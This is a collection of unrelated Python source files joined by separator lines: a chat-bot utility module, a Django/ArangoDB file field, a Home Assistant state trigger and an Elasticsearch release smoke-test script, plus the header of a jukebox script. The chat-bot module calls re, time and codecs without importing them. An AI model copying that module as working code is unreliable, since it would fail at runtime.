import requests
import json
from bs4 import BeautifulSoup
from requests.models import PreparedRequest
import requests.exceptions
def checkrank(num):
    """Decorator factory: run the wrapped command handler only when the
    invoking user's rank is at least *num*; otherwise return None."""
    def getrank(func):
        def wrapper(self, cirno, username, args):
            user_rank = cirno.userdict[username]['rank']
            if user_rank < num:
                return None
            return func(self, cirno, username, args)
        return wrapper
    return getrank
def throttle(num):
    """Decorator factory: rate-limit a command handler per user.

    The first invocation for a user always runs; later invocations run
    only when at least *num* seconds have passed since the previous
    attempt.  Note that the stored timestamp is refreshed on every
    attempt, throttled or not, exactly as before.
    """
    def counter(func):
        def wrapper(self, cirno, username, args):
            now = time.time()
            if username in cirno.cmdthrottle:
                elapsed = time.time() - cirno.cmdthrottle[username]
                cirno.cmdthrottle[username] = time.time()
                if elapsed >= num:
                    return func(self, cirno, username, args)
                return None
            cirno.cmdthrottle[username] = now
            return func(self, cirno, username, args)
        return wrapper
    return counter
def filterchat(msg):
    """Decode the HTML entities the chat server escapes, strip leading
    whitespace and markup tags, and return the cleaned message text.

    Messages carrying an inline chat picture are routed through
    filter_images() instead, which keeps only the command word and the
    image URL.
    """
    # These substitutions are plain literals, so str.replace is the right
    # tool: the previous re.sub() calls had been mangled down to their
    # replacement characters ('(' alone is an invalid regex and raised
    # re.error); the entity patterns are restored here.
    for entity, char in (
        ("&#39;", "'"),
        ("&amp;", "&"),
        ("&lt;", "<"),
        ("&gt;", ">"),
        ("&quot;", "\""),
        ("&#40;", "("),
        ("&#41;", ")"),
    ):
        msg = msg.replace(entity, char)
    if 'img class="chat-picture"' in msg:
        return filter_images(msg)
    msg = re.sub("^[ \t]+", "", msg)
    msg = remove_tags(msg)
    return msg


def filter_images(msg):
    """Reduce an inline-image message to '<command> <image-url>'.

    Falls back to the original message when no src="..." attribute is
    present (re.search returns None and .group raises AttributeError).
    """
    try:
        cmd = msg.split(' ')[0]
        matches = re.search('src="([^"]+)"', msg)
        return "%s %s" % (cmd, matches.group(1))
    except AttributeError:  # narrowed from a bare except
        return msg


def remove_tags(msg):
    """Strip every <...> markup tag from *msg*."""
    tag = re.compile('<[^>]+>')
    return tag.sub('', msg)
def updatesettings(cirno):
    """Reload cirno.settings from settings.json; when the file is missing
    or unreadable, write the current in-memory settings out instead.

    Only file-system and JSON-decoding errors are treated as "needs a
    rewrite": the previous bare ``except`` also swallowed
    KeyboardInterrupt and SystemExit.
    """
    try:
        cirno.settings = readsettings()
    except (OSError, ValueError):
        # ValueError covers json.JSONDecodeError on a corrupt file.
        writesettings(cirno)
def check_picture(pic):
    """Return True when *pic* still resolves to a live image.

    Imgur's 'removed' placeholder and an HTTP 404 both count as dead.
    """
    response = requests.get(pic)
    gone = (response.url == "https://i.imgur.com/removed.png"
            or response.status_code == 404)
    return not gone
def check_allowed_sources(cirno, source):
    """Return True when the domain inside the src="..." attribute of
    *source* is one of the bot's whitelisted image hosts."""
    host = re.search('src="(https?://)?(.+?)(\/.*)"', source).group(2)
    return host in cirno.allowed_sources
def check_url(url):
    """Return True iff *url* carries a scheme requests can prepare."""
    try:
        PreparedRequest().prepare_url(url, None)
    except requests.exceptions.MissingSchema:
        return False
    return True
def writesettings(cirno):
    """Persist cirno.settings to settings.json as UTF-8 JSON."""
    with codecs.open('settings.json', 'w', 'utf8') as handle:
        json.dump(cirno.settings, handle, ensure_ascii=False)
def readsettings():
    """Load and return the bot settings from settings.json (UTF-8 JSON).

    Uses a context manager so the handle is closed promptly; the
    previous version leaked the file object returned by codecs.open.
    """
    with codecs.open('settings.json', 'r', 'utf-8') as handle:
        return json.load(handle)
def parsemedialink(url):
    """Map a media URL (or 'jw:'/'rtmp://' shorthand) to a descriptor
    dict {'id': ..., 'type': ...}; unknown inputs yield None/None."""
    def media(media_id, media_type):
        return {'id': media_id, 'type': media_type}

    if type(url) is not str:
        return media(None, None)
    if url.startswith('jw:'):
        return media(url[3:], 'jw')
    if url.startswith('rtmp://'):
        return media(url, 'rt')
    if 'youtube.com' in url:
        m = re.search(r'(https?://)?(www\.)?(youtube|youtu)'
                      r'\.(com|be)/(watch\?v=|v/)?([^&#]+)', url)
        return media(m.group(6), 'yt')
    if 'google.com/file' in url:
        m = re.search(r'(docs.google.com|drive.google.com)'
                      '/(file/d)/([^/]*)', url)
        return media(m.group(3), 'gd')
    if 'google.com/open' in url:
        m = re.search(r'(docs.google.com|drive.google.com)'
                      '/(.+?id=)?([^&#]+)', url)
        return media(m.group(3), 'gd')

    # Simple host-based services all share the "group 3 is the id"
    # pattern shape; checked in the same order as before.
    hosted = (
        ('twitch.tv', r'(https?://)?(twitch.tv)/([^&#]+)', 'tw'),
        ('livestream.com', r'(https?://)?(livestream.com)/([^&#]+)', 'li'),
        ('ustream.tv', r'(https?://)?(ustream.tv)/([^&#]+)', 'us'),
        ('vimeo.com', r'(https?://)?(vimeo.com)/([^&#]+)', 'vi'),
        ('dailymotion.com', r'(https?://)?(dailymotion.com/video)/([^&#]+)', 'dm'),
        ('vid.me', r'(https?://)?(vid.me)/([^&#]+)', 'vm'),
        ('streamable.com', r'(https?://)?(streamable.com)/([^&#]+)', 'sb'),
    )
    for marker, pattern, media_type in hosted:
        if marker in url:
            return media(re.search(pattern, url).group(3), media_type)

    if url.endswith(".m3u8"):
        return media(url, 'hl')
    if 'soundcloud.com' in url:
        return media(url, 'sc')
    return media(None, None)
| |
import os
from datetime import datetime, date
from django.core.files.base import File
from django.core.files.storage import default_storage
from django.conf import settings
from django.utils.encoding import force_str, force_text
from django.utils import timezone
from django.utils.translation import ugettext as _
from django.db.models.fields.files import FileDescriptor
from arangodb.orm.fields import TextField, BooleanField, DateField, DatetimeField
import collections
class FieldFile(File):
    """File wrapper bound to a model instance and its FileField; all
    storage operations are delegated to the field's storage backend."""

    def __init__(self, instance, field, name):
        super(FieldFile, self).__init__(None, name)
        self.instance = instance
        self.field = field
        self.storage = field.storage
        # True once the content has been written to storage.
        self._committed = True

    def __eq__(self, other):
        # Older code may be expecting FileField values to be simple strings.
        # By overriding the == operator, it can remain backwards compatibility.
        if hasattr(other, 'name'):
            return self.name == other.name
        return self.name == other

    def __ne__(self, other):
        return not self.__eq__(other)

    def __hash__(self):
        return hash(self.name)

    # The standard File contains most of the necessary properties, but
    # FieldFiles can be instantiated without a name, so that needs to
    # be checked for here.

    def _require_file(self):
        if not self:
            raise ValueError("The '%s' attribute has no file associated with it." % self.field.name)

    def _get_file(self):
        # Lazily open the underlying storage file on first access.
        self._require_file()
        if not hasattr(self, '_file') or self._file is None:
            self._file = self.storage.open(self.name, 'rb')
        return self._file

    def _set_file(self, file):
        self._file = file

    def _del_file(self):
        del self._file

    file = property(_get_file, _set_file, _del_file)

    def _get_path(self):
        self._require_file()
        return self.storage.path(self.name)
    path = property(_get_path)

    def _get_url(self):
        self._require_file()
        return self.storage.url(self.name)
    url = property(_get_url)

    def _get_size(self):
        self._require_file()
        if not self._committed:
            return self.file.size
        return self.storage.size(self.name)
    size = property(_get_size)

    def open(self, mode='rb'):
        self._require_file()
        self.file.open(mode)
    # open() doesn't alter the file's contents, but it does reset the pointer
    open.alters_data = True

    # In addition to the standard File API, FieldFiles have extra methods
    # to further manipulate the underlying file, as well as update the
    # associated model instance.

    def save(self, name, content, save=True):
        # name = self.field.generate_filename(self.instance, name)

        self.name = self.storage.save(name, content)
        setattr(self.instance, self.field.name, self.name)

        # Update the filesize cache
        self._size = content.size
        self._committed = True

        # Save the object because it has changed, unless save is False
        if save:
            self.instance.save()
    save.alters_data = True

    def delete(self, save=True):
        if not self:
            return
        # Only close the file if it's already open, which we know by the
        # presence of self._file
        if hasattr(self, '_file'):
            self.close()
            del self.file

        self.storage.delete(self.name)

        self.name = None
        setattr(self.instance, self.field.name, self.name)

        # Delete the filesize cache
        if hasattr(self, '_size'):
            del self._size
        self._committed = False

        if save:
            self.instance.save()
    delete.alters_data = True

    def _get_closed(self):
        file = getattr(self, '_file', None)
        return file is None or file.closed
    closed = property(_get_closed)

    def close(self):
        file = getattr(self, '_file', None)
        if file is not None:
            file.close()

    def __getstate__(self):
        # FieldFile needs access to its associated model field and an instance
        # it's attached to in order to work properly, but the only necessary
        # data to be pickled is the file's name itself. Everything else will
        # be restored later, by FileDescriptor below.
        return {'name': self.name, 'closed': False, '_committed': True, '_file': None}
class FileField(TextField):
    """ORM field that stores an uploaded file's name as text and proxies
    file access through a Django storage backend."""

    # The class to wrap instance attributes in. Accessing the file object off
    # the instance will always return an instance of attr_class.
    attr_cls = FieldFile

    # The descriptor to use for accessing the attribute off of the class.
    descriptor_class = FileDescriptor

    def __init__(self, upload_to='', storage=None, **kwargs):
        """Create the field.

        :param upload_to: strftime-style directory pattern, or a callable
            (instance, filename) -> path that replaces generate_filename.
        :param storage: Django storage backend; defaults to default_storage.
        """
        super(FileField, self).__init__(**kwargs)

        self.file_name = None
        self.storage = storage or default_storage
        self.upload_to = upload_to
        if isinstance(upload_to, collections.Callable):
            self.generate_filename = upload_to

    def create_file_instance(self, model_instance):
        """Wrap the stored name in a FieldFile bound to *model_instance*."""
        self.file = self.attr_cls(instance=model_instance, field=self, name=self.file_name)

    def on_save(self, model_instance):
        """Commit pending file content to storage before the model saves."""
        self.create_file_instance(model_instance)
        file = self.file

        # This was reset
        # NOTE(review): content_file is only assigned in set(); if on_save
        # runs before set() this raises AttributeError — confirm call order.
        if self.file_name == self.content_file:
            return

        if file:
            # Commit the file to storage prior to saving the model
            file.save(file.name, self.content_file, save=False)

    def get(self):
        """Return the stored file name (may be None)."""
        return self.file_name

    def set(self, *args, **kwargs):
        """Accept a single value: either a bare name (a generated path is
        derived from it) or a ready-made path containing '/'."""
        # Fixed: was `len(args) is 1` — identity comparison on an int only
        # works by the CPython small-int cache accident.
        if len(args) == 1:
            value = args[0]

            self.content_file = value
            if '/' not in value:
                self.file_name = self.generate_filename(self, value)
            else:
                self.file_name = value

    def dumps(self):
        """Serialize as the file's absolute storage path."""
        return self.file.path

    def loads(self, string_val):
        """Restore the field from its serialized name."""
        self.file_name = string_val

    def validate(self):
        """Delegate to TextField validation."""
        super(FileField, self).validate()

    def get_directory_name(self):
        # Expand strftime placeholders in upload_to against "now".
        return os.path.normpath(force_text(datetime.now().strftime(force_str(self.upload_to))))

    def get_filename(self, filename):
        return os.path.normpath(self.storage.get_valid_name((filename)))

    def generate_filename(self, instance, filename):
        return os.path.join(self.get_directory_name(), self.get_filename(filename))
class DjangoBooleanField(BooleanField):
    """Boolean field exposing Django-admin-style choice tuples."""

    flatchoices = (
        (False, _('False')),
        (True, _('True')),
    )

    def __getattribute__(self, item):
        """Intercept attribute access on the field.

        NOTE(review): 'choices' returns the literal True rather than a
        choice iterable — presumably just to make callers treat the
        field as "has choices"; confirm nothing iterates the result.
        """
        if item == 'choices':
            return True
        else:
            # NOTE(review): super(BooleanField, self) starts the MRO walk
            # above BooleanField rather than above DjangoBooleanField;
            # verify that is intentional.
            return super(BooleanField, self).__getattribute__(item)
class DjangoDateField(DateField):
    """
    Can be timezone aware
    """

    def __init__(self, **kwargs):
        """Initialise self.date from the default value, NULL-ness, or
        today's date (timezone-aware when USE_TZ is set)."""
        super(DjangoDateField, self).__init__(**kwargs)

        if self.default:
            self.date = self.default
        elif self.null:
            self.date = None
        elif getattr(settings, 'USE_TZ', False):
            self.date = timezone.now().date()
        else:
            self.date = date.today()
class DjangoTimeField(DatetimeField):
    """
    Can be timezone aware
    """

    def __init__(self, **kwargs):
        """Initialise self.time from the default value, NULL-ness, or
        the current time (timezone-aware when USE_TZ is set)."""
        super(DjangoTimeField, self).__init__(**kwargs)

        if self.default:
            self.time = self.default
        elif self.null:
            self.time = None
        elif getattr(settings, 'USE_TZ', False):
            self.time = timezone.now()
        else:
            self.time = datetime.now()
| |
"""Offer state listening automation rules."""
from __future__ import annotations
from datetime import timedelta
import logging
from typing import Any
import voluptuous as vol
from homeassistant import exceptions
from homeassistant.const import CONF_ATTRIBUTE, CONF_FOR, CONF_PLATFORM, MATCH_ALL
from homeassistant.core import CALLBACK_TYPE, HassJob, HomeAssistant, State, callback
from homeassistant.helpers import config_validation as cv, template
from homeassistant.helpers.event import (
Event,
async_track_same_state,
async_track_state_change_event,
process_state_match,
)
# mypy: allow-incomplete-defs, allow-untyped-calls, allow-untyped-defs
# mypy: no-check-untyped-defs
_LOGGER = logging.getLogger(__name__)

# Configuration keys specific to the state trigger.
CONF_ENTITY_ID = "entity_id"
CONF_FROM = "from"
CONF_TO = "to"

# Options shared by both trigger schemas below.
BASE_SCHEMA = {
    vol.Required(CONF_PLATFORM): "state",
    vol.Required(CONF_ENTITY_ID): cv.entity_ids,
    vol.Optional(CONF_FOR): cv.positive_time_period_template,
    vol.Optional(CONF_ATTRIBUTE): cv.match_all,
}

# Schema used when no attribute is configured: triggers on entity state.
TRIGGER_STATE_SCHEMA = vol.Schema(
    {
        **BASE_SCHEMA,
        # These are str on purpose. Want to catch YAML conversions
        vol.Optional(CONF_FROM): vol.Any(str, [str]),
        vol.Optional(CONF_TO): vol.Any(str, [str]),
    }
)

# Schema used when CONF_ATTRIBUTE is present: from/to may be any value.
TRIGGER_ATTRIBUTE_SCHEMA = vol.Schema(
    {
        **BASE_SCHEMA,
        vol.Optional(CONF_FROM): cv.match_all,
        vol.Optional(CONF_TO): cv.match_all,
    }
)
def TRIGGER_SCHEMA(value: Any) -> dict:  # pylint: disable=invalid-name
    """Validate trigger."""
    if not isinstance(value, dict):
        raise vol.Invalid("Expected a dictionary")

    # We use this approach instead of vol.Any because
    # this gives better error messages.
    schema = (
        TRIGGER_ATTRIBUTE_SCHEMA if CONF_ATTRIBUTE in value else TRIGGER_STATE_SCHEMA
    )
    return schema(value)
async def async_attach_trigger(
    hass: HomeAssistant,
    config,
    action,
    automation_info,
    *,
    platform_type: str = "state",
) -> CALLBACK_TYPE:
    """Listen for state changes based on configuration.

    Returns a callback that removes the listener and cancels any pending
    `for:` duration waits.
    """
    entity_id = config.get(CONF_ENTITY_ID)
    from_state = config.get(CONF_FROM, MATCH_ALL)
    to_state = config.get(CONF_TO, MATCH_ALL)
    time_delta = config.get(CONF_FOR)
    # `for:` may contain templates; attach hass so they can be rendered later.
    template.attach(hass, time_delta)
    match_all = from_state == MATCH_ALL and to_state == MATCH_ALL
    # Per-entity cancel callbacks for in-flight `for:` waits.
    unsub_track_same = {}
    # Per-entity rendered `for:` durations.
    period: dict[str, timedelta] = {}
    match_from_state = process_state_match(from_state)
    match_to_state = process_state_match(to_state)
    attribute = config.get(CONF_ATTRIBUTE)
    job = HassJob(action)
    trigger_id = automation_info.get("trigger_id") if automation_info else None
    _variables = {}
    if automation_info:
        _variables = automation_info.get("variables") or {}
    @callback
    def state_automation_listener(event: Event):
        """Listen for state changes and calls action."""
        entity: str = event.data["entity_id"]
        from_s: State | None = event.data.get("old_state")
        to_s: State | None = event.data.get("new_state")
        # Resolve the values being compared: the full state string, or a
        # single attribute when `attribute:` is configured.
        if from_s is None:
            old_value = None
        elif attribute is None:
            old_value = from_s.state
        else:
            old_value = from_s.attributes.get(attribute)
        if to_s is None:
            new_value = None
        elif attribute is None:
            new_value = to_s.state
        else:
            new_value = to_s.attributes.get(attribute)
        # When we listen for state changes with `match_all`, we
        # will trigger even if just an attribute changes. When
        # we listen to just an attribute, we should ignore all
        # other attribute changes.
        if attribute is not None and old_value == new_value:
            return
        if (
            not match_from_state(old_value)
            or not match_to_state(new_value)
            or (not match_all and old_value == new_value)
        ):
            return
        @callback
        def call_action():
            """Call action with right context."""
            hass.async_run_hass_job(
                job,
                {
                    "trigger": {
                        "platform": platform_type,
                        "entity_id": entity,
                        "from_state": from_s,
                        "to_state": to_s,
                        "for": time_delta if not time_delta else period[entity],
                        "attribute": attribute,
                        "description": f"state of {entity}",
                        "id": trigger_id,
                    }
                },
                event.context,
            )
        # No `for:` configured: fire immediately.
        if not time_delta:
            call_action()
            return
        trigger_info = {
            "trigger": {
                "platform": "state",
                "entity_id": entity,
                "from_state": from_s,
                "to_state": to_s,
            }
        }
        variables = {**_variables, **trigger_info}
        # Render the (possibly templated) `for:` duration for this entity.
        try:
            period[entity] = cv.positive_time_period(
                template.render_complex(time_delta, variables)
            )
        except (exceptions.TemplateError, vol.Invalid) as ex:
            _LOGGER.error(
                "Error rendering '%s' for template: %s", automation_info["name"], ex
            )
            return
        def _check_same_state(_, _2, new_st: State):
            # Decide whether the trigger condition still holds while the
            # `for:` period elapses; returning False cancels the wait.
            if new_st is None:
                return False
            if attribute is None:
                cur_value = new_st.state
            else:
                cur_value = new_st.attributes.get(attribute)
            if CONF_FROM in config and CONF_TO not in config:
                # Only `from:` was given: any move away from old_value counts.
                return cur_value != old_value
            return cur_value == new_value
        # Fire call_action only if the state holds for the whole period.
        unsub_track_same[entity] = async_track_same_state(
            hass,
            period[entity],
            call_action,
            _check_same_state,
            entity_ids=entity,
        )
    unsub = async_track_state_change_event(hass, entity_id, state_automation_listener)
    @callback
    def async_remove():
        """Remove state listeners async."""
        unsub()
        # NOTE: the loop variable shadows this function's own name locally;
        # the values are the per-entity `for:`-wait cancel callbacks.
        for async_remove in unsub_track_same.values():
            async_remove()
        unsub_track_same.clear()
    return async_remove
| |
# Licensed to Elasticsearch under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on
# an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
# Smoke-tests a release candidate
#
# 1. Downloads the tar.gz, deb, RPM and zip file from the staging URL
# 2. Verifies it's sha1 hashes and GPG signatures against the release key
# 3. Installs all official plugins
# 4. Starts one node for tar.gz and zip packages and checks:
# -- if it runs with Java 1.8
# -- if the build hash given is the one that is returned by the status response
# -- if the build is a release version and not a snapshot version
# -- if all plugins are loaded
# -- if the status response returns the correct version
#
# USAGE:
#
# python3 -B ./dev-tools/smoke_test_rc.py --version 2.0.0-beta1 --hash bfa3e47
#
# to also test other plugins try run
#
# python3 -B ./dev-tools/smoke_test_rc.py --version 2.0.0-beta1 --hash bfa3e47 --plugins license,shield,watcher
#
# Note: Ensure the script is run from the elasticsearch top level directory
#
# For testing a release from sonatype try this:
#
# python3 -B dev-tools/smoke_test_rc.py --version 2.0.0-beta1 --hash bfa3e47 --fetch_url https://oss.sonatype.org/content/repositories/releases/
#
import argparse
import tempfile
import os
import signal
import shutil
import urllib
import urllib.request
import hashlib
import time
import socket
import json
import base64
from urllib.parse import urlparse
from prepare_release_candidate import run
from http.client import HTTPConnection
# Official plugins installed (and later verified as loaded) during the smoke test.
DEFAULT_PLUGINS = ["analysis-icu",
                   "analysis-kuromoji",
                   "analysis-phonetic",
                   "analysis-smartcn",
                   "analysis-stempel",
                   "discovery-azure-classic",
                   "discovery-ec2",
                   "discovery-file",
                   "discovery-gce",
                   "ingest-attachment",
                   "ingest-geoip",
                   "ingest-user-agent",
                   "lang-javascript",
                   "lang-python",
                   "mapper-attachments",
                   "mapper-murmur3",
                   "mapper-size",
                   "repository-azure",
                   "repository-gcs",
                   "repository-hdfs",
                   "repository-s3",
                   "store-smb"]
# JAVA_HOME is required up front: every shell command run by this script is
# prefixed with the export snippet built from it (see java_exe()).
try:
  JAVA_HOME = os.environ['JAVA_HOME']
except KeyError:
  raise RuntimeError("""
  Please set JAVA_HOME in the env before running release tool
  On OSX use: export JAVA_HOME=`/usr/libexec/java_home -v '1.8*'`""")
def java_exe():
  """Return a shell prefix that selects the JAVA_HOME JVM for child commands."""
  home = JAVA_HOME
  return 'export JAVA_HOME="%s" PATH="%s/bin:$PATH" JAVACMD="%s/bin/java"' % (home, home, home)
def verify_java_version(version):
  """Run ``java -version`` and fail unless it reports the given version prefix."""
  output = os.popen('%s; java -version 2>&1' % java_exe()).read()
  expected = ' version "%s.' % version
  if expected not in output:
    raise RuntimeError('got wrong version for java %s:\n%s' % (version, output))
def sha1(file):
  """Return the hex SHA-1 digest of *file*.

  Reads in fixed-size chunks so release artifacts of any size can be hashed
  without loading the whole file into memory (the previous version read the
  entire file at once).

  :param file: path of the file to hash
  :return: 40-char lowercase hex digest string
  """
  digest = hashlib.sha1()
  with open(file, 'rb') as f:
    for chunk in iter(lambda: f.read(65536), b''):
      digest.update(chunk)
  return digest.hexdigest()
def read_fully(file):
  """Return the entire contents of *file* decoded as UTF-8 text."""
  with open(file, encoding='utf-8') as fh:
    return fh.read()
def wait_for_node_startup(es_dir, timeout=60, header=None):
  """Poll the node's HTTP port until it answers 200 or *timeout* expires.

  Fixes the mutable default argument (``header={}``) — a shared dict default
  would leak mutations across calls.

  :param es_dir: elasticsearch install dir (its logs/http.ports names the host)
  :param timeout: maximum seconds to wait; one probe per second
  :param header: optional HTTP headers dict (e.g. auth); None means none
  :return: True once a probe returns HTTP 200, False on timeout
  """
  if header is None:
    header = {}
  print(' Waiting until node becomes available for at most %s seconds' % timeout)
  for _ in range(timeout):
    conn = None
    try:
      time.sleep(1)
      host = get_host_from_ports_file(es_dir)
      conn = HTTPConnection(host, timeout=1)
      conn.request('GET', '/', headers=header)
      res = conn.getresponse()
      if res.status == 200:
        return True
    except IOError:
      # that is ok, the node might not be there yet; retry on the next tick
      pass
    finally:
      if conn:
        conn.close()
  return False
def download_and_verify(version, hash, files, base_url, plugins=DEFAULT_PLUGINS):
  """Download each release artifact, verify sha1 and GPG signature, then smoke test.

  The temp download directory is always removed, even on failure.

  :param version: release version string, e.g. '2.0.0-beta1'
  :param hash: unified-release build hash (used for staged plugin installs)
  :param files: artifact file paths relative to base_url
  :param base_url: staging (or sonatype) repository URL
  :param plugins: plugins to install during the smoke test
  """
  print('Downloading and verifying release %s from %s' % (version, base_url))
  tmp_dir = tempfile.mkdtemp()
  try:
    downloaded_files = []
    print(' ' + '*' * 80)
    # here we create a temp gpg home where we download the release key as the only key into
    # when we verify the signature it will fail if the signed key is not in the keystore and that
    # way we keep the executing host unmodified since we don't have to import the key into the default keystore
    gpg_home_dir = os.path.join(tmp_dir, "gpg_home_dir")
    os.makedirs(gpg_home_dir, 0o700)
    run('gpg --homedir %s --keyserver pool.sks-keyservers.net --recv-key D88E42B4' % gpg_home_dir)
    for file in files:
      name = os.path.basename(file)
      print('  Smoketest file: %s' % name)
      url = '%s/%s' % (base_url, file)
      print('  Downloading %s' % (url))
      artifact_path = os.path.join(tmp_dir, file)
      downloaded_files.append(artifact_path)
      current_artifact_dir = os.path.dirname(artifact_path)
      urllib.request.urlretrieve(url, os.path.join(tmp_dir, file))
      # fetch and check the published sha1 checksum
      sha1_url = ''.join([url, '.sha1'])
      checksum_file = artifact_path + ".sha1"
      print('  Downloading %s' % (sha1_url))
      urllib.request.urlretrieve(sha1_url, checksum_file)
      print('  Verifying checksum %s' % (checksum_file))
      expected = read_fully(checksum_file)
      actual = sha1(artifact_path)
      if expected != actual :
        raise RuntimeError('sha1 hash for %s doesn\'t match %s != %s' % (name, expected, actual))
      # fetch and verify the detached GPG signature inside the throwaway
      # gpg home, so only the release key can satisfy the verification
      gpg_url = ''.join([url, '.asc'])
      gpg_file = artifact_path + ".asc"
      print('  Downloading %s' % (gpg_url))
      urllib.request.urlretrieve(gpg_url, gpg_file)
      print('  Verifying gpg signature %s' % (gpg_file))
      run('cd %s && gpg --homedir %s --verify %s' % (current_artifact_dir, gpg_home_dir, os.path.basename(gpg_file)))
      print(' ' + '*' * 80)
      print()
    smoke_test_release(version, downloaded_files, hash, plugins)
    print(' SUCCESS')
  finally:
    shutil.rmtree(tmp_dir)
def get_host_from_ports_file(es_dir):
  """Return the first host:port entry the node wrote to logs/http.ports."""
  ports_file = os.path.join(es_dir, 'logs/http.ports')
  return read_fully(ports_file).splitlines()[0]
def smoke_test_release(release, files, hash, plugins):
  """Unpack each tar.gz/zip artifact, install plugins, start a node and verify it.

  Checks via the REST API: version number matches *release*, build is not a
  snapshot, and every requested plugin (and no other) is loaded.  deb/rpm
  artifacts are skipped.  The node is killed via its pidfile and the unpack
  dir removed even on failure.

  :param release: expected version string
  :param files: artifact paths to test
  :param hash: build hash for staged plugin installs
  :param plugins: plugin names to install and verify
  """
  for release_file in files:
    if not os.path.isfile(release_file):
      raise RuntimeError('Smoketest failed missing file %s' % (release_file))
    tmp_dir = tempfile.mkdtemp()
    if release_file.endswith('tar.gz'):
      run('tar -xzf %s -C %s' % (release_file, tmp_dir))
    elif release_file.endswith('zip'):
      run('unzip %s -d %s' % (release_file, tmp_dir))
    else:
      print('  Skip SmokeTest for [%s]' % release_file)
      continue # nothing to do here
    es_dir = os.path.join(tmp_dir, 'elasticsearch-%s' % (release))
    es_run_path = os.path.join(es_dir, 'bin/elasticsearch')
    print('  Smoke testing package [%s]' % release_file)
    es_plugin_path = os.path.join(es_dir, 'bin/elasticsearch-plugin')
    plugin_names = {}
    for plugin in plugins:
      print('  Install plugin [%s]' % (plugin))
      # es.plugins.staging points the plugin tool at the staged build hash
      run('%s; export ES_JAVA_OPTS="-Des.plugins.staging=%s"; %s %s %s' % (java_exe(), hash, es_plugin_path, 'install -b', plugin))
      plugin_names[plugin] = True
    if 'x-pack' in plugin_names:
      # x-pack secures the HTTP API: create a superuser and send basic auth
      headers = { 'Authorization' : 'Basic %s' % base64.b64encode(b"es_admin:foobar").decode("UTF-8") }
      es_shield_path = os.path.join(es_dir, 'bin/x-pack/users')
      print("  Install dummy shield user")
      run('%s; %s useradd es_admin -r superuser -p foobar' % (java_exe(), es_shield_path))
    else:
      headers = {}
    print('  Starting elasticsearch deamon from [%s]' % es_dir)
    try:
      run('%s; %s -Enode.name=smoke_tester -Ecluster.name=prepare_release -Escript.inline=true -Escript.stored=true -Erepositories.url.allowed_urls=http://snapshot.test* %s -Epidfile=%s -Enode.portsfile=true'
          % (java_exe(), es_run_path, '-d', os.path.join(es_dir, 'es-smoke.pid')))
      if not wait_for_node_startup(es_dir, header=headers):
        print("elasticsearch logs:")
        print('*' * 80)
        logs = read_fully(os.path.join(es_dir, 'logs/prepare_release.log'))
        print(logs)
        print('*' * 80)
        raise RuntimeError('server didn\'t start up')
      try: # we now get / and /_nodes to fetch basic infos like hashes etc and the installed plugins
        host = get_host_from_ports_file(es_dir)
        conn = HTTPConnection(host, timeout=20)
        conn.request('GET', '/', headers=headers)
        res = conn.getresponse()
        if res.status == 200:
          version = json.loads(res.read().decode("utf-8"))['version']
          if release != version['number']:
            raise RuntimeError('Expected version [%s] but was [%s]' % (release, version['number']))
          if version['build_snapshot']:
            raise RuntimeError('Expected non snapshot version')
          print('  Verify if plugins are listed in _nodes')
          conn.request('GET', '/_nodes?plugin=true&pretty=true', headers=headers)
          res = conn.getresponse()
          if res.status == 200:
            nodes = json.loads(res.read().decode("utf-8"))['nodes']
            for _, node in nodes.items():
              node_plugins = node['plugins']
              for node_plugin in node_plugins:
                if not plugin_names.get(node_plugin['name'].strip(), False):
                  raise RuntimeError('Unexpected plugin %s' % node_plugin['name'])
                del plugin_names[node_plugin['name']]
            # anything left in plugin_names was requested but never loaded
            if plugin_names:
              raise RuntimeError('Plugins not loaded %s' % list(plugin_names.keys()))
          else:
            raise RuntimeError('Expected HTTP 200 but got %s' % res.status)
        else:
          raise RuntimeError('Expected HTTP 200 but got %s' % res.status)
      finally:
        conn.close()
    finally:
      pid_path = os.path.join(es_dir, 'es-smoke.pid')
      if os.path.exists(pid_path): # try reading the pid and kill the node
        pid = int(read_fully(pid_path))
        os.kill(pid, signal.SIGKILL)
      shutil.rmtree(tmp_dir)
    print(' ' + '*' * 80)
    print()
def parse_list(string):
  """Split a comma-separated string into a list of whitespace-stripped tokens."""
  return [token.strip() for token in string.split(',')]
# Script entry point: parse CLI args, compute the artifact names for all four
# package formats and run the download-and-smoke-test pass.
if __name__ == "__main__":
  parser = argparse.ArgumentParser(description='SmokeTests a Release Candidate from S3 staging repo')
  parser.add_argument('--version', '-v', dest='version', default=None,
                      help='The Elasticsearch Version to smoke-tests', required=True)
  parser.add_argument('--hash', '-s', dest='hash', default=None, required=True,
                      help='The hash of the unified release')
  parser.add_argument('--plugins', '-p', dest='plugins', default=[], required=False, type=parse_list,
                      help='A list of additional plugins to smoketest')
  parser.add_argument('--fetch_url', '-u', dest='url', default=None,
                      help='Fetched from the specified URL')
  # NOTE(review): these set_defaults calls look redundant — the add_argument
  # calls above already declare the same defaults; confirm before removing.
  parser.set_defaults(hash=None)
  parser.set_defaults(plugins=[])
  parser.set_defaults(version=None)
  parser.set_defaults(url=None)
  args = parser.parse_args()
  plugins = args.plugins
  version = args.version
  hash = args.hash
  url = args.url
  files = [ x % {'version': version} for x in [
    'elasticsearch-%(version)s.tar.gz',
    'elasticsearch-%(version)s.zip',
    'elasticsearch-%(version)s.deb',
    'elasticsearch-%(version)s.rpm'
  ]]
  verify_java_version('1.8')
  # --fetch_url overrides the default staging repository location
  if url:
    download_url = url
  else:
    download_url = 'https://staging.elastic.co/%s-%s/downloads/elasticsearch' % (version, hash)
  download_and_verify(version, hash, files, download_url, plugins=DEFAULT_PLUGINS + plugins)
| |
# ******************************************************************************
# Cloud jukebox
# Copyright Paul Dardeau, SwampBits LLC, 2014
# BSD license -- see LICENSE file for details
#
# (1) create a directory for the jukebox (e.g., ~/jukebox)
#
# This cloud jukebox uses an abstract object storage system.
# (2) copy this source file to $JUKEBOX
# (3) create subdirectory for song imports (e.g., mkdir $JUKEBOX/song-import)
# (4) create subdirectory for song-play (e.g., mkdir $JUKEBOX/song-play)
#
# Song file naming convention:
#
# The-Artist-Name--Album-Name--The-Song-Name.ext
